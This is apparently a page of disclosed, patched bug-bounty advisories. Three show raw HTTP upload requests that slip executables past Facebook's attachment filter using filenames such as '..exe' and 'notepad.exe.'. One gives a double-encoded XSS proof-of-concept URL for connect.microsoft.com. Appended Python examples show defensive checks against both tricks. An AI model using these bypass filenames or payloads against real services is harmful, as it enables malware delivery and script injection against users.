Description
Sow Ching Shiong, an independent vulnerability researcher, has discovered an Arbitrary File Upload vulnerability in attachments.facebook.com, which can be exploited by an attacker to compromise a victim's computer system.
Proof of concept
HTTP Request
===========
POST /ajax/messaging/upload.php HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Content-Type: multipart/form-data; boundary=---------------------------7db2e171a0068
Accept-Encoding: gzip, deflate
Host: attachments.facebook.com
Content-Length: 194182
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: [information removed]

-----------------------------7db2e171a0068
Content-Disposition: form-data; name="post_form_id"

[information removed]
-----------------------------7db2e171a0068
Content-Disposition: form-data; name="fb_dtsg"

[information removed]
-----------------------------7db2e171a0068
Content-Disposition: form-data; name="id"

[information removed]
-----------------------------7db2e171a0068
Content-Disposition: form-data; name="attachment"; filename="..exe"
Content-Type: application/octet-stream
Conclusion
This vulnerability has been confirmed and patched by the Facebook Security Team. I would like to thank them for their quick response to my report.
Facebook White Hat
https://www.facebook.com/whitehat
Description
Sow Ching Shiong, an independent vulnerability researcher, has discovered an Arbitrary File Upload vulnerability in attachments.facebook.com, which can be exploited by an attacker to compromise a victim's computer system.
Proof of concept
HTTP Request
===========
POST /ajax/messaging/upload.php HTTP/1.1
Host: attachments.facebook.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
DNT: 1
Proxy-Connection: keep-alive
Cookie: [information removed]
Content-Type: multipart/form-data; boundary=---------------------------265001916915724
Content-Length: 194200

-----------------------------265001916915724
Content-Disposition: form-data; name="post_form_id"

[information removed]
-----------------------------265001916915724
Content-Disposition: form-data; name="fb_dtsg"

[information removed]
-----------------------------265001916915724
Content-Disposition: form-data; name="id"

[information removed]
-----------------------------265001916915724
Content-Disposition: form-data; name="attachment"; filename="notepad.exe."
Content-Type: application/octet-stream
Conclusion
This vulnerability has been confirmed and patched by the Facebook Security Team. I would like to thank them for their quick response to my report.
Facebook White Hat
https://www.facebook.com/whitehat
Description
Sow Ching Shiong, an independent vulnerability researcher, has discovered a Cross-Site Scripting (XSS) vulnerability in connect.microsoft.com, which can be exploited by an attacker to conduct XSS attacks.
Proof of concept
Tested in IE9 with XSS filter enabled
============================
http://connect.microsoft.com/sqlserver/searchresults.aspx?UserHandle=%2522%253E%2527%253E%253Cscript%2520%253Ealert%2528/XSS by Sow Ching Shiong/%2529%253B%253C%252Fscript%2520%253E
Conclusion
This vulnerability has been confirmed and patched by the Microsoft Security Team. I would like to thank them for their quick response to my report.
Microsoft White Hat
http://technet.microsoft.com/en-us/security/cc308575
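The UserHandle value in the proof-of-concept URL above is percent-encoded twice (%253C decodes to %3C, and only then to <). The following is an added example, not code from the original advisory or from Microsoft: a server-side check that decodes input to a stable form, rejects multiply-encoded values, and HTML-escapes what it renders. The function names, the MAX_ROUNDS bound and the shortened sample value are assumptions made for illustration.

```python
import html
from urllib.parse import unquote

MAX_ROUNDS = 5  # assumption: upper bound on decoding passes


def canonicalize(value: str, max_rounds: int = MAX_ROUNDS):
    """Percent-decode until the value stops changing; return (decoded, rounds)."""
    rounds = 0
    while rounds < max_rounds:
        decoded = unquote(value)
        if decoded == value:
            break
        value, rounds = decoded, rounds + 1
    return value, rounds


def render_search_term(raw: str) -> str:
    """Reject multiply-encoded input, then HTML-escape the decoded value."""
    decoded, rounds = canonicalize(raw)
    if rounds > 1:
        # Legitimate clients encode a query value once; more is treated as hostile.
        raise ValueError(f"input was percent-encoded {rounds} times")
    return html.escape(decoded, quote=True)


# Constructed sample: the opening of the PoC's UserHandle value, as sent on the wire.
SAMPLE = "%2522%253E%253Cscript%2520%253E"

if __name__ == "__main__":
    print("after one decode :", unquote(SAMPLE))        # still no angle brackets
    print("canonical form   :", canonicalize(SAMPLE))   # markup appears here
    try:
        render_search_term(SAMPLE)
    except ValueError as exc:
        print("rejected         :", exc)
```

A filter that inspects the value after a single decode sees only percent sequences; the markup characters appear only in the canonical form, which is why the check runs after decoding to a fixed point.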
Description
Sow Ching Shiong, an independent vulnerability researcher, has discovered an Arbitrary File Upload vulnerability in attachments.facebook.com, which can be exploited by an attacker to compromise a victim's computer system.
Proof of concept
HTTP Request
===========
POST /ajax/messaging/upload.php HTTP/1.1
Host: attachments.facebook.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
DNT: 1
Proxy-Connection: keep-alive
Cookie: [information removed]
Content-Type: multipart/form-data; boundary=---------------------------4827543632391
Content-Length: 194188

-----------------------------4827543632391
Content-Disposition: form-data; name="post_form_id"

[information removed]
-----------------------------4827543632391
Content-Disposition: form-data; name="fb_dtsg"

[information removed]
-----------------------------4827543632391
Content-Disposition: form-data; name="id"

[information removed]
-----------------------------4827543632391
Content-Disposition: form-data; name="attachment"; filename="notepad.EXE"
Content-Type: application/octet-stream
Conclusion
This vulnerability has been confirmed and patched by the Facebook Security Team. I would like to thank them for their quick response to my report.
Facebook White Hat
https://www.facebook.com/whitehat
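The three upload requests on this page differ only in the attachment filename: "..exe", "notepad.exe." and "notepad.EXE". The following is an added example, not code from the original advisories or from Facebook: a constructed naive extension check shown beside a hardened one that normalizes the name first. The function names, the one-entry block list and the two control filenames are assumptions made for illustration.

```python
import os
import re

BLOCKED = {"exe"}  # assumption: the single type this example rejects


def naive_is_blocked(filename: str) -> bool:
    """Constructed 'before' check: exact, case-sensitive match on splitext()."""
    return os.path.splitext(filename)[1] in {".exe"}


def canonical_name(filename: str) -> str:
    """Reduce a client-supplied name to the form a Windows client would save."""
    name = re.split(r"[\\/]", filename)[-1]   # drop any path component
    name = name.rstrip(". ")                  # Win32 strips trailing dots and spaces
    return name.lower()                       # extension matching is case-insensitive


def is_blocked(filename: str) -> bool:
    """Hardened check: compare the final extension of the canonical name."""
    name = canonical_name(filename)
    if not name:
        return True                           # nothing left after normalization
    ext = name.rsplit(".", 1)[-1] if "." in name else ""
    return ext in BLOCKED


def compare(filenames):
    """Return {filename: (naive verdict, hardened verdict)}."""
    return {f: (naive_is_blocked(f), is_blocked(f)) for f in filenames}


# The three filenames from the advisories, plus two constructed controls.
SAMPLES = ["..exe", "notepad.exe.", "notepad.EXE", "notepad.exe", "report.pdf"]

if __name__ == "__main__":
    for name, (naive, hardened) in compare(SAMPLES).items():
        print(f"{name!r:16} naive={naive!s:5} hardened={hardened}")
```

os.path.splitext() treats the leading dots of "..exe" as part of the base name and returns "." as the extension of "notepad.exe.", so the naive check passes all three advisory filenames. An allow-list of permitted types applied to the canonical name is the stronger design.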